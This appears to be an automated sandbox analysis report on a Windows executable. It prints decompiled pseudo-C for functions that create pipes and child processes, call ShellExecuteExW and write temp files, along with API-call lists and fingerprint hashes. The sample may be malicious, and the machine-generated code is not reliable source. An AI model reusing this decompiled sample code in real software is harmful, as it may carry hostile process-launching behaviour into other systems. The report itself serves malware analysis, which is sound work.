						_t282 = RtlAllocateHeap( *0x418068, 0, 8 + (_t165 + wcslen(_a8)) * 2);
						_v172 = _t282;
						if( *_t256 == 0x22) {
							wcscpy(_t282, _t256);
						} else {
							wcscpy(_t282, "\"");
							wcscat(_t282, _t256);
							wcscat(_t282, "\"");
							_t295 =  &(_t295[6]);
						}
						_t275 = 0;
						if( *_v0 != 0) {
							wcscat(_t282, " ");
							wcscat(_t282, _v0);
							_t295 =  &(_t295[4]);
							_t275 = 0;
						}
						_t265 = _a4;
						if(_t265 != 0) {
							asm("sbb eax, eax");
							_t265 = _t265 &  ~( *_t265 & 0x0000ffff);
							_a4 = _t265;
						}
						_t174 = CreateProcessW(_t275, _t282, _t275, _t275, _v180, _t292, _t275, _t265,  &_v136,  &(_v156.lpSecurityDescriptor)); // executed
						if(_t174 == 0) {
							if(_v196 != _t276) {
								CloseHandle(_v196);
							}
							if(_v176 != _t276) {
								CloseHandle(_v176);
							}
							if(_v184 != _t276) {
								CloseHandle(_v184);
							}
							if(_v200 != _t276) {
								CloseHandle(_v200);
							}
							if(_v192 != _t276) {
								CloseHandle(_v192);
							}
							if(_v188 != _t276) {
								CloseHandle(_v188);
							}
							if((_a8 & 0x00000078) != 0) {
								goto L75;
							} else {
								if(_a4 != _t276) {
									L68:
									_t283 = 0x3c;
									memset( &_v68, 0, _t283);
									_v68.nShow = _v136.wShowWindow & 0x0000ffff;
									_v68.lpVerb = 0;
									_v68.lpDirectory = _a4;
									_v68.lpParameters = _v0;
									_v68.cbSize = _t283;
									_v68.fMask = 0x540;
									_v68.lpFile = _t256;
									if(ShellExecuteExW( &_v68) == 0) {
										goto L75;
									}
									_t257 = _a4;
									if((_t257 & 0x00000001) != 0) {
										WaitForSingleObject(_v68.hIcon, 0xffffffff);
									}
									if(_v172 == _t276) {
										CloseHandle(_v68.hIcon);
										goto L74;
									} else {
										 *0x41750c(0x418730);
										_t189 = E0040E192(0x418148);
										_t276 = _t189;
										 *0x417514(0x418730, 0x20);
										_t276[1] = _t276[1] | 0xffffffff;
										 *_t276 = _v68.hkeyClass;
										_t175 = 0;
										_t276[3] = 0;
										_t276[2] = 0;
										_t276[4] = 0;
										_t276[5] = _t257;
										goto L76;
									}
								}
								_t124 = wcslen(_t256) - 1; // -1
								_t286 = _t256 + _t124 * 2;
								if(_t286 <= _t256) {
									goto L68;
								}
								while( *_t286 != 0x5c) {
									_t286 = _t286 - 2;
									if(_t286 > _t256) {
										continue;
									}
									break;
								}
								if(_t286 > _t256) {
									wcscpy(_v172, _t256);
									_t195 = _v172;
									_a4 = _t195;
									 *((short*)(_t195 + 2 + (_t286 - _t256 >> 1) * 2)) = 0;
								}
								goto L68;
							}
						} else {
							if(_v196 != _t276) {
								CloseHandle(_v196);
							}
							if(_v200 != _t276) {
								CloseHandle(_v200);
							}
							if(_v192 != _t276) {
								CloseHandle(_v192);
							}
							CloseHandle(_v156.bInheritHandle);
							_t258 = _a8;
							if((_t258 & 0x00000001) != 0) {
								WaitForSingleObject(_v156.lpSecurityDescriptor.hProcess, 0xffffffff);
							}
							if(_v168 == _t276) {
								CloseHandle(_v156.lpSecurityDescriptor.hProcess);
								L74:
								_t276 = 1;
								goto L75;
							} else {
								 *0x41750c(0x418730);
								_t205 = E0040E192(0x418148);
								_t276 = _t205;
								 *0x417514(0x418730, 0x20);
								 *_t276 = _v160;
								_t276[1] = _v156.lpSecurityDescriptor;
								_t276[3] = _v184;
								_t276[2] = _v192;
								_t276[4] = _v196;
								_t276[5] = _t258;
								L75:
								_t175 = 0;
								L76:
								HeapFree( *0x418068, _t175, _v172);
								return _t276;
							}
						}
					}
				}
			}








































                                        0x004099cd
                                        0x004099d5
                                        0x004099d8
                                        0x004099db
                                        0x004099df
                                        0x004099e1
                                        0x004099e7
                                        0x004099ec
                                        0x004099f0
                                        0x004099f4
                                        0x004099f8
                                        0x004099fc
                                        0x00409a05
                                        0x00409a09
                                        0x00409a0e
                                        0x00409a15
                                        0x00409a18
                                        0x00409a21
                                        0x00409a28
                                        0x00409a3a
                                        0x00409a3b
                                        0x00409a2a
                                        0x00409a2c
                                        0x00409a2f
                                        0x00409a37
                                        0x00409a37
                                        0x00409a4c
                                        0x00409a75
                                        0x00409a78
                                        0x00000000
                                        0x00409a97
                                        0x00409a9b
                                        0x00409aa3
                                        0x00409aaf
                                        0x00409ab4
                                        0x00409ab5
                                        0x00000000
                                        0x00409ab5
                                        0x00409a4e
                                        0x00409a4e
                                        0x00409a57
                                        0x00000000
                                        0x00000000
                                        0x00409a59
                                        0x00409a5e
                                        0x00000000
                                        0x00409a60
                                        0x00409a60
                                        0x00409a68
                                        0x00409a6f
                                        0x00409abd
                                        0x00409abd
                                        0x00409ac0
                                        0x00409ac2
                                        0x00409ac5
                                        0x00409ac9
                                        0x00409ad2
                                        0x00409af0
                                        0x00409af8
                                        0x00409b04
                                        0x00409b09
                                        0x00409b0a
                                        0x00409b0d
                                        0x00409b0d
                                        0x00409b18
                                        0x00409b36
                                        0x00409b3e
                                        0x00409b4a
                                        0x00409b50
                                        0x00409b53
                                        0x00409b53
                                        0x00409b18
                                        0x00409b63
                                        0x00409b72
                                        0x00409b78
                                        0x00409b78
                                        0x00409b86
                                        0x00409b8c
                                        0x00409b8c
                                        0x00409b9a
                                        0x00409ba0
                                        0x00409ba0
                                        0x00409b9a
                                        0x00409ba7
                                        0x00409bb5
                                        0x00409bb7
                                        0x00409bb7
                                        0x00409bc0
                                        0x00409bc2
                                        0x00409bc2
                                        0x00409bca
                                        0x00409bfc
                                        0x00409bfe
                                        0x00409c02
                                        0x00409c28
                                        0x00409c04
                                        0x00409c0a
                                        0x00409c11
                                        0x00409c1c
                                        0x00409c21
                                        0x00409c21
                                        0x00409c36
                                        0x00409c3b
                                        0x00409c43
                                        0x00409c50
                                        0x00409c55
                                        0x00409c58
                                        0x00409c58
                                        0x00409c5a
                                        0x00409c63
                                        0x00409c6a
                                        0x00409c6c
                                        0x00409c6e
                                        0x00409c6e
                                        0x00409c8a
                                        0x00409c92
                                        0x00409d48
                                        0x00409d4e
                                        0x00409d4e
                                        0x00409d54
                                        0x00409d5a
                                        0x00409d5a
                                        0x00409d60
                                        0x00409d66
                                        0x00409d66
                                        0x00409d6c
                                        0x00409d72
                                        0x00409d72
                                        0x00409d78
                                        0x00409d7e
                                        0x00409d7e
                                        0x00409d84
                                        0x00409d8a
                                        0x00409d8a
                                        0x00409d94
                                        0x00000000
                                        0x00409d9a
                                        0x00409da1
                                        0x00409de7
                                        0x00409de9
                                        0x00409df6
                                        0x00409e06
                                        0x00409e0f
                                        0x00409e1d
                                        0x00409e2b
                                        0x00409e3a
                                        0x00409e41
                                        0x00409e4c
                                        0x00409e5b
                                        0x00000000
                                        0x00000000
                                        0x00409e5d
                                        0x00409e67
                                        0x00409e72
                                        0x00409e72
                                        0x00409e7c
                                        0x00409ec5
                                        0x00000000
                                        0x00409e7e
                                        0x00409e84
                                        0x00409e91
                                        0x00409e99
                                        0x00409e9b
                                        0x00409ea8
                                        0x00409eac
                                        0x00409eae
                                        0x00409eb0
                                        0x00409eb3
                                        0x00409eb6
                                        0x00409eb9
                                        0x00000000
                                        0x00409eb9
                                        0x00409e7c
                                        0x00409daa
                                        0x00409dad
                                        0x00409db2
                                        0x00000000
                                        0x00000000
                                        0x00409db4
                                        0x00409dba
                                        0x00409dbf
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x00409dbf
                                        0x00409dc3
                                        0x00409dca
                                        0x00409dcf
                                        0x00409ddb
                                        0x00409de2
                                        0x00409de2
                                        0x00000000
                                        0x00409dc3
                                        0x00409c98
                                        0x00409ca2
                                        0x00409ca8
                                        0x00409ca8
                                        0x00409cae
                                        0x00409cb4
                                        0x00409cb4
                                        0x00409cba
                                        0x00409cc0
                                        0x00409cc0
                                        0x00409cc6
                                        0x00409cc8
                                        0x00409cd2
                                        0x00409cda
                                        0x00409cda
                                        0x00409ce4
                                        0x00409d37
                                        0x00409ec7
                                        0x00409ec9
                                        0x00000000
                                        0x00409ce6
                                        0x00409cec
                                        0x00409cf9
                                        0x00409d01
                                        0x00409d03
                                        0x00409d0d
                                        0x00409d13
                                        0x00409d1a
                                        0x00409d21
                                        0x00409d28
                                        0x00409d2b
                                        0x00409eca
                                        0x00409eca
                                        0x00409ecc
                                        0x00409ed7
                                        0x00409ee9
                                        0x00409ee9
                                        0x00409ce4
                                        0x00409c92
                                        0x00409a5e

                                        APIs
                                        • memset.MSVCRT ref: 00409A09
                                        • CreatePipe.KERNEL32(?,?,?,00000000,?,?,00000000,00000000,00404626,00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 00409A91
                                        • CreatePipe.KERNEL32(?,?,?,00000000,?,?,00000000,00000000,00404626,00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 00409AE6
                                        • CreatePipe.KERNEL32(?,?,?,00000000,?,?,00000000,00000000,00404626,00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 00409B2C
                                        • GetStdHandle.KERNEL32(000000F6), ref: 00409B76
                                        • GetStdHandle.KERNEL32(000000F5), ref: 00409B8A
                                        • GetStdHandle.KERNEL32(000000F4), ref: 00409B9E
                                        • wcslen.MSVCRT ref: 00409BCA
                                        • wcslen.MSVCRT ref: 00409BD8
                                        • RtlAllocateHeap.KERNEL32(00000000,00000000), ref: 00409BF2
                                        • wcscpy.MSVCRT ref: 00409C0A
                                        • wcscat.MSVCRT ref: 00409C11
                                        • wcscat.MSVCRT ref: 00409C1C
                                        • wcscpy.MSVCRT ref: 00409C28
                                        • wcscat.MSVCRT ref: 00409C43
                                        • wcscat.MSVCRT ref: 00409C50
                                        • CreateProcessW.KERNELBASE(00000000,00000000,00000000,00000000,?,?,00000000,?,?,?), ref: 00409C8A
                                        • CloseHandle.KERNEL32(?,?,00000000,?,?,?), ref: 00409CA8
                                        • CloseHandle.KERNEL32(?,?,00000000,?,?,?), ref: 00409CB4
                                        • CloseHandle.KERNEL32(?,?,00000000,?,?,?), ref: 00409CC0
                                        • CloseHandle.KERNEL32(?,?,00000000,?,?,?), ref: 00409CC6
                                        • WaitForSingleObject.KERNEL32(?,000000FF,?,00000000,?,?,?), ref: 00409CDA
                                        • RtlEnterCriticalSection.KERNEL32(00418730,?,00000000,?,?,?), ref: 00409CEC
                                        • RtlLeaveCriticalSection.KERNEL32(00418730,?,00000000,?,?,?), ref: 00409D03
                                        • CloseHandle.KERNEL32(?,?,00000000,?,?,?), ref: 00409D37
                                        • CloseHandle.KERNEL32(?,?,00000000,?,?,?), ref: 00409D4E
                                        • CloseHandle.KERNEL32(?,?,00000000,?,?,?), ref: 00409D5A
                                        • CloseHandle.KERNEL32(?,?,00000000,?,?,?), ref: 00409D66
                                        • CloseHandle.KERNEL32(?,?,00000000,?,?,?), ref: 00409D72
                                        • CloseHandle.KERNEL32(?,?,00000000,?,?,?), ref: 00409D7E
                                        • CloseHandle.KERNEL32(?,?,00000000,?,?,?), ref: 00409D8A
                                        • wcslen.MSVCRT ref: 00409DA4
                                        • wcscpy.MSVCRT ref: 00409DCA
                                        • memset.MSVCRT ref: 00409DF6
                                        • ShellExecuteExW.SHELL32 ref: 00409E53
                                        • WaitForSingleObject.KERNEL32(?,000000FF), ref: 00409E72
                                        • RtlEnterCriticalSection.KERNEL32(00418730), ref: 00409E84
                                        • RtlLeaveCriticalSection.KERNEL32(00418730), ref: 00409E9B
                                          • Part of subcall function 00409967: GetCurrentProcess.KERNEL32(?,00000000,00000000,00000002,00000000,?,?,00409B4F,?), ref: 00409976
                                          • Part of subcall function 00409967: GetCurrentProcess.KERNEL32(?,00000000,?,?,00409B4F,?), ref: 00409982
                                          • Part of subcall function 00409967: DuplicateHandle.KERNEL32(00000000,?,?,00409B4F,?), ref: 00409989
                                          • Part of subcall function 00409967: CloseHandle.KERNEL32(?,?,?,00409B4F,?), ref: 00409995
                                        • HeapFree.KERNEL32(00000000,?), ref: 00409ED7
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.500372099.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.500367164.0000000000400000.00000002.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.500385946.0000000000413000.00000002.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.500401597.0000000000417000.00000004.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.500408085.0000000000419000.00000002.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.500484490.000000000045B000.00000002.00020000.sdmp Download File
                                        Similarity
                                        • API ID: Handle$Close$CreateCriticalSectionwcscat$PipeProcesswcscpywcslen$CurrentEnterHeapLeaveObjectSingleWaitmemset$AllocateDuplicateExecuteFreeShell
                                        • String ID: $0A$x
                                        • API String ID: 2446549976-3693508903
                                        • Opcode ID: 4039e7c79bc79cc42dfc9b4a1c80486cd472c08549e126a09e4e4a62091c835c
                                        • Instruction ID: 9d81f6c31acd4bb562af1ee80b25a18f64af65630f534ad577d0c511c9ebf9ce
                                        • Opcode Fuzzy Hash: 4039e7c79bc79cc42dfc9b4a1c80486cd472c08549e126a09e4e4a62091c835c
                                        • Instruction Fuzzy Hash: 15E14971908340AFD321DF24C841B9BBBE4FF84354F148A3FF499A2291DB799944CB9A
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 0040196C, Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 168COMMON
                                        Download Yara Rule
                                        C-Code - Quality: 56%
                                        			E0040196C(char __edx) {
				intOrPtr _v12;
				char _v16;
				signed int _v24;
				WCHAR* _v28;
				intOrPtr _v32;
				char _v40;
				WCHAR* _v52;
				WCHAR* _v76;
				WCHAR* _v100;
				intOrPtr _v116;
				void* _t28;
				void* _t29;
				void* _t35;
				void* _t36;
				void* _t44;
				void* _t45;
				void* _t54;
				void* _t55;
				void* _t63;
				void* _t68;
				char* _t72;
				void* _t74;
				void* _t75;
				void* _t79;
				char _t86;
				void* _t87;
				void* _t88;
				void* _t89;
				void* _t90;
				void* _t91;
				void* _t92;
				void* _t93;
				void* _t94;
				void* _t95;
				void* _t97;
				void* _t100;
				intOrPtr* _t101;

				_t86 = __edx;
				_push(0);
				_push(0);
				_push(0);
				_push(0);
				_push(0);
				_push(0);
				E0040E600();
				 *0x41808c = 0x4170fb;
				_v28 = 0;
				while(1) {
					_t103 = 3 - _v28;
					if(3 < _v28) {
						break;
					}
					_t72 =  *0x41808c; // 0x41708e
					_v24 =  *_t72;
					 *0x41808c =  *0x41808c + 1;
					_t74 = E0040E4C0();
					_t97 = _t86;
					_push(_t74);
					_push(_t97);
					_t75 = E0040E4C0();
					E00405D60(_t103, _v24 * 0xffffffff);
					E0040E500( &_v28, _t75);
					_push(_v32);
					_t79 = E0040E4C0();
					_pop(_t100);
					E0040E660(_t100);
					_t86 = _v40;
					E0040E660(_t86);
					E0040E500( &_v40, _t79);
					 *_t101 =  *_t101 + 1;
					_t104 =  *_t101;
					if( *_t101 >= 0) {
						continue;
					}
					break;
				}
				_v16 = E0040A1C0(0x400);
				_t28 = E0040E4C0();
				_t87 = _t86;
				_push(_t28);
				_t29 = E0040E4C0();
				_t88 = _t87;
				E0040AD76(_t104, _t29);
				_push( &_v16);
				E0040E500();
				GetTempFileNameW(_v24, 0x417020, 0, _v28); // executed
				_t35 = E0040E4C0();
				_t89 = _t88;
				_push(_t35);
				_t36 = E0040E4C0();
				_t90 = _t89;
				E0040A1E0(_v28, _t36);
				_push(0x4180d0);
				E0040E500();
				E0040AE07( *0x4180d0);
				E0040ACE5( *0x4180d0); // executed
				GetTempFileNameW( *0x4180d0, 0x417020, 0, _v52); // executed
				_t44 = E0040E4C0();
				_t91 = _t90;
				_push(_t44);
				_t45 = E0040E4C0();
				_t92 = _t91;
				E0040A1E0(_v52, _t45);
				_push(0x418084);
				E0040E500();
				E0040AE07( *0x418084);
				E0040ACE5( *0x418084); // executed
				GetTempFileNameW( *0x418084, 0x417020, 0, _v76); // executed
				PathAddBackslashW( *0x418084);
				_t54 = E0040E4C0();
				_t93 = _t92;
				_push(_t54);
				_t55 = E0040E4C0();
				_t94 = _t93;
				E0040A1E0(_v76, _t55);
				_push(0x418098);
				E0040E500();
				E0040AE07( *0x418098);
				PathRenameExtensionW( *0x418098, _v100);
				GetTempFileNameW( *0x418084, 0x417020, 0, _v100); // executed
				_t63 = E0040E4C0();
				_t95 = _t94;
				_push(_t63);
				E0040A1E0(_v100, E0040E4C0());
				E0040E500(0x4180c8, _t95);
				_t68 = E0040A1A0(_v116);
				return E0040E590(E0040E590(E0040E590(_t68, _v12), _v28), _v28);
			}








































                                        0x0040196c
                                        0x0040196f
                                        0x00401970
                                        0x00401971
                                        0x00401972
                                        0x00401973
                                        0x00401974
                                        0x00401975
                                        0x0040197f
                                        0x00401984
                                        0x0040198d
                                        0x00401992
                                        0x00401995
                                        0x00000000
                                        0x00000000
                                        0x00401997
                                        0x0040199f
                                        0x004019a3
                                        0x004019aa
                                        0x004019af
                                        0x004019b0
                                        0x004019b1
                                        0x004019b2
                                        0x004019c1
                                        0x004019cb
                                        0x004019d4
                                        0x004019d5
                                        0x004019da
                                        0x004019dd
                                        0x004019e2
                                        0x004019e7
                                        0x004019f1
                                        0x004019f6
                                        0x004019f6
                                        0x004019f9
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x004019f9
                                        0x00401a05
                                        0x00401a0a
                                        0x00401a0f
                                        0x00401a10
                                        0x00401a12
                                        0x00401a17
                                        0x00401a19
                                        0x00401a22
                                        0x00401a23
                                        0x00401a3b
                                        0x00401a41
                                        0x00401a46
                                        0x00401a47
                                        0x00401a49
                                        0x00401a4e
                                        0x00401a54
                                        0x00401a5f
                                        0x00401a60
                                        0x00401a6b
                                        0x00401a76
                                        0x00401a90
                                        0x00401a96
                                        0x00401a9b
                                        0x00401a9c
                                        0x00401a9e
                                        0x00401aa3
                                        0x00401aa9
                                        0x00401ab4
                                        0x00401ab5
                                        0x00401ac0
                                        0x00401acb
                                        0x00401ae5
                                        0x00401af0
                                        0x00401af6
                                        0x00401afb
                                        0x00401afc
                                        0x00401afe
                                        0x00401b03
                                        0x00401b09
                                        0x00401b14
                                        0x00401b15
                                        0x00401b20
                                        0x00401b2f
                                        0x00401b49
                                        0x00401b4f
                                        0x00401b54
                                        0x00401b55
                                        0x00401b62
                                        0x00401b6e
                                        0x00401b77
                                        0x00401b9f

                                        APIs
                                          • Part of subcall function 0040E600: TlsGetValue.KERNEL32(0000001B,?,00402EF9,00000000,00000000,00000000,00000000,?,0040118D,00000000,00000000,00000000,00000001,00000004,00000000,00417060), ref: 0040E617
                                        • GetTempFileNameW.KERNEL32(?,00417020,00000000,00000000,?,00000000,00000000,00000400,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00404519), ref: 00401A3B
                                        • GetTempFileNameW.KERNEL32(00417020,00000000,00000000,00000000,?,00000000,00000000,?,00417020,00000000,00000000,?,00000000,00000000,00000400,00000000), ref: 00401A90
                                        • GetTempFileNameW.KERNEL32(00417020,00000000,00000000,00000000,?,00000000,00000000,00417020,00000000,00000000,00000000,?,00000000,00000000,?,00417020), ref: 00401AE5
                                        • PathAddBackslashW.SHLWAPI(00417020,00000000,00000000,00000000,?,00000000,00000000,00417020,00000000,00000000,00000000,?,00000000,00000000,?,00417020), ref: 00401AF0
                                        • PathRenameExtensionW.SHLWAPI(?,00000000,?,00000000,00000000,00417020,00000000,00000000,00000000,?,00000000,00000000,00417020,00000000,00000000,00000000), ref: 00401B2F
                                        • GetTempFileNameW.KERNEL32(00417020,00000000,00000000,?,00000000,?,00000000,00000000,00417020,00000000,00000000,00000000,?,00000000,00000000,00417020), ref: 00401B49
                                          • Part of subcall function 0040E4C0: GetLastError.KERNEL32(00001000,00000000,00000000), ref: 0040E4C6
                                          • Part of subcall function 0040E4C0: TlsGetValue.KERNEL32(0000001B), ref: 0040E4D5
                                          • Part of subcall function 0040E4C0: SetLastError.KERNEL32(?), ref: 0040E4EB
                                          • Part of subcall function 0040E500: TlsGetValue.KERNEL32(0000001B,00000000,00000000), ref: 0040E50C
                                          • Part of subcall function 0040E500: RtlAllocateHeap.NTDLL(022F0000,00000000,?), ref: 0040E539
                                          • Part of subcall function 0040E660: wcslen.MSVCRT ref: 0040E677
                                          • Part of subcall function 0040E500: RtlReAllocateHeap.NTDLL(022F0000,00000000,?,?), ref: 0040E55C
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.500372099.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.500367164.0000000000400000.00000002.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.500385946.0000000000413000.00000002.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.500401597.0000000000417000.00000004.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.500408085.0000000000419000.00000002.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.500484490.000000000045B000.00000002.00020000.sdmp Download File
                                        Similarity
                                        • API ID: FileNameTemp$Value$AllocateErrorHeapLastPath$BackslashExtensionRenamewcslen
                                        • String ID: pA$ pA$ pA$ pA
                                        • API String ID: 368575804-2459985135
                                        • Opcode ID: 4d8f3ce84a2c484ddc054159815926436bf35c2cb9f99eba8dbea060a2143662
                                        • Instruction ID: 20c411bd22273699d356ad82c96ab9d1ff1690f55a3839ad69a92283717a25ff
                                        • Opcode Fuzzy Hash: 4d8f3ce84a2c484ddc054159815926436bf35c2cb9f99eba8dbea060a2143662
                                        • Instruction Fuzzy Hash: 9B5119B1514304BED600BB73DC42E7F7A6DEB88308F01CC3FB144A60A2DA3D99659A6D
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 00401000, Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 108memoryCOMMON
                                        Download Yara Rule
                                        C-Code - Quality: 51%
                                        			_entry_(void* __ecx, void* __edx, void* __eflags) {
				void _t3;
				void* _t6;
				void* _t38;
				intOrPtr _t52;
				void* _t53;
				void* _t56;
				void* _t59;
				void* _t60;
				void* _t61;
				void* _t62;
				void* _t65;

				_t65 = __eflags;
				_t56 = __edx;
				_t53 = __ecx;
				memset(0x418068, 0, 0xac);
				 *0x41806c = GetModuleHandleW(0);
				_t3 = HeapCreate(0, 0x1000, 0); // executed
				 *0x418068 = _t3;
				E00405000(_t56);
				 *0x41808c = 0x417078; // executed
				_t6 = E0040E470(); // executed
				E0040E1DD(_t6);
				E0040A3E1(E0040A949(E0040B0C0()));
				E0040A160();
				E00409609(); // executed
				E00408D8E(_t53); // executed
				E004053B5();
				E0040CD63(_t65);
				E0040B810(_t65);
				E00405068(0x418074, 0x41702a);
				 *0x418094 = GetStdHandle(0xfffffff5);
				_push(0x200);
				_push(0x418110);
				_push(0);
				E0040A400(4, 0x15);
				E0040A9FA( *0x4180f8);
				_push(7);
				_push(0x417068);
				E0040A968(8, 0x4180f8);
				E0040A9FA( *0x418100);
				_push(8);
				_push(0x417060);
				E0040A968(4, 0x418100);
				_push(0x4180f0);
				_push(0x417070);
				E0040E206(0xc, 0x186a1, 7);
				E00405068(0x4180c4, 0x417036);
				E0040A9FA( *0x418108);
				_push(8);
				_push(0x417060);
				E0040A968(4, 0x418108);
				SetConsoleCtrlHandler(E004020CE, 1); // executed
				E00409F50(E00401F4C);
				_t38 = E0040E4C0();
				_t59 = 0x417036;
				E00402EED(0x4180c4, _t59, _t65, _t38);
				_push(0x4180a0);
				E0040E500();
				E00401BA0(0x4180c4, _t59, _t65);
				_t52 =  *0x4180b0; // 0x0
				_t66 = _t52 - 1;
				if(_t52 == 1) {
					E00402FAD(0x4180c4, _t59, _t60, _t61, _t66);
				}
				E00403F53(0x4180c4, _t60, _t61, _t62);
				_push(0);
				L5();
				E0040E4A0();
				HeapDestroy( *0x418068);
				ExitProcess(??);
				E00405373();
				E00409F70();
				E0040ACD5();
				E0040D8E4(E0040B0B0());
				return E0040A150();
			}














                                        0x00401000
                                        0x00401000
                                        0x00401000
                                        0x0040100f
                                        0x00401021
                                        0x00401035
                                        0x0040103a
                                        0x0040103f
                                        0x00401049
                                        0x0040104e
                                        0x00401053
                                        0x00401062
                                        0x00401067
                                        0x0040106c
                                        0x00401071
                                        0x00401076
                                        0x0040107b
                                        0x00401080
                                        0x00401090
                                        0x0040109f
                                        0x004010a9
                                        0x004010b0
                                        0x004010b3
                                        0x004010be
                                        0x004010c9
                                        0x004010ce
                                        0x004010d3
                                        0x004010e4
                                        0x004010ef
                                        0x004010f4
                                        0x004010f9
                                        0x0040110a
                                        0x0040110f
                                        0x00401114
                                        0x00401128
                                        0x00401138
                                        0x00401143
                                        0x00401148
                                        0x0040114d
                                        0x0040115e
                                        0x0040116f
                                        0x0040117b
                                        0x00401181
                                        0x00401186
                                        0x00401188
                                        0x0040118d
                                        0x00401192
                                        0x00401197
                                        0x0040119c
                                        0x004011a2
                                        0x004011a5
                                        0x004011a7
                                        0x004011a7
                                        0x004011ac
                                        0x004011b1
                                        0x004011b6
                                        0x004011bb
                                        0x004011c6
                                        0x004011cb
                                        0x004011d0
                                        0x004011d5
                                        0x004011da
                                        0x004011e4
                                        0x004011ee

                                        APIs
                                        • memset.MSVCRT ref: 0040100F
                                        • GetModuleHandleW.KERNEL32(00000000), ref: 0040101C
                                        • HeapCreate.KERNEL32(00000000,00001000,00000000,00000000), ref: 00401035
                                          • Part of subcall function 0040E470: HeapCreate.KERNELBASE(00000000,00001000,00000000,?,00401053,00000000,00001000,00000000,00000000), ref: 0040E47C
                                          • Part of subcall function 0040E470: TlsAlloc.KERNEL32(?,00401053,00000000,00001000,00000000,00000000), ref: 0040E487
                                          • Part of subcall function 0040A160: HeapCreate.KERNELBASE(00000000,00001000,00000000,0040106C,00000000,00001000,00000000,00000000), ref: 0040A169
                                          • Part of subcall function 00409609: RtlInitializeCriticalSection.KERNEL32(00418730,00000004,00000004,004095DC,00000010,00000000,00000000,00401071,00000000,00001000,00000000,00000000), ref: 00409631
                                          • Part of subcall function 00408D8E: memset.MSVCRT ref: 00408D9B
                                          • Part of subcall function 00408D8E: 6FC38420.COMCTL32(00000008,00001000), ref: 00408DB5
                                          • Part of subcall function 00408D8E: CoInitialize.OLE32(00000000), ref: 00408DBD
                                          • Part of subcall function 004053B5: RtlInitializeCriticalSection.KERNEL32(00418708,0040107B,00000000,00001000,00000000,00000000), ref: 004053BA
                                        • GetStdHandle.KERNEL32(FFFFFFF5,00000000,00001000,00000000,00000000), ref: 0040109A
                                          • Part of subcall function 0040A400: RtlAllocateHeap.KERNEL32(00000000,0000003C,00000200,?,?,?,004010C3,00000004,00000015,00000000,00000200,00000200,FFFFFFF5,00000000,00001000,00000000), ref: 0040A41F
                                          • Part of subcall function 0040A400: RtlAllocateHeap.KERNEL32(00000008,00000015,?,?,?,?,004010C3,00000004,00000015,00000000,00000200,00000200,FFFFFFF5,00000000,00001000,00000000), ref: 0040A445
                                          • Part of subcall function 0040A400: RtlAllocateHeap.KERNEL32(00000008,FFFFFFED,FFFFFFED,00000010,00010000,00000004,00000200,?,?,?,?,004010C3,00000004,00000015,00000000,00000200), ref: 0040A4A2
                                          • Part of subcall function 0040A9FA: HeapFree.KERNEL32(00000000,?,?,?,00000000,?,?,?,004010CE,00000004,00000015,00000000,00000200,00000200,FFFFFFF5,00000000), ref: 0040AA38
                                          • Part of subcall function 0040A9FA: HeapFree.KERNEL32(00000000,?,?,00000000,?,?,?,004010CE,00000004,00000015,00000000,00000200,00000200,FFFFFFF5,00000000,00001000), ref: 0040AA51
                                          • Part of subcall function 0040A9FA: HeapFree.KERNEL32(00000000,00000000,?,00000000,?,?,?,004010CE,00000004,00000015,00000000,00000200,00000200,FFFFFFF5,00000000,00001000), ref: 0040AA5B
                                          • Part of subcall function 0040A968: RtlAllocateHeap.KERNEL32(00000000,00000034,?,?,?,004010E9,00000008,00000000,00417068,00000007,00000004,00000015,00000000,00000200,00000200,FFFFFFF5), ref: 0040A97B
                                          • Part of subcall function 0040A968: RtlAllocateHeap.KERNEL32(FFFFFFF5,00000008,?,?,?,004010E9,00000008,00000000,00417068,00000007,00000004,00000015,00000000,00000200,00000200,FFFFFFF5), ref: 0040A990
                                          • Part of subcall function 0040E206: RtlAllocateHeap.NTDLL(00000000,FFFFFFDD,?,00000200,?,?,?,0040112D,0000000C,000186A1,00000007,00417070,004180F0,00000004,00000000,00417060), ref: 0040E236
                                          • Part of subcall function 0040E206: memset.MSVCRT ref: 0040E271
                                        • SetConsoleCtrlHandler.KERNEL32(00000000,00000001,00000004,00000000,00417060,00000008,0000000C,000186A1,00000007,00417070,004180F0,00000004,00000000,00417060,00000008,00000008), ref: 0040116F
                                          • Part of subcall function 0040E4C0: GetLastError.KERNEL32(00001000,00000000,00000000), ref: 0040E4C6
                                          • Part of subcall function 0040E4C0: TlsGetValue.KERNEL32(0000001B), ref: 0040E4D5
                                          • Part of subcall function 0040E4C0: SetLastError.KERNEL32(?), ref: 0040E4EB
                                          • Part of subcall function 0040E500: TlsGetValue.KERNEL32(0000001B,00000000,00000000), ref: 0040E50C
                                          • Part of subcall function 0040E500: RtlAllocateHeap.NTDLL(022F0000,00000000,?), ref: 0040E539
                                          • Part of subcall function 00401BA0: LoadLibraryExW.KERNEL32(00000000,00000000,00000000,00000002,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,?,0040119C,004180A0,00000000), ref: 00401BDE
                                          • Part of subcall function 00401BA0: EnumResourceTypesW.KERNEL32 ref: 00401BFB
                                          • Part of subcall function 00401BA0: FreeLibrary.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000002,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00401C03
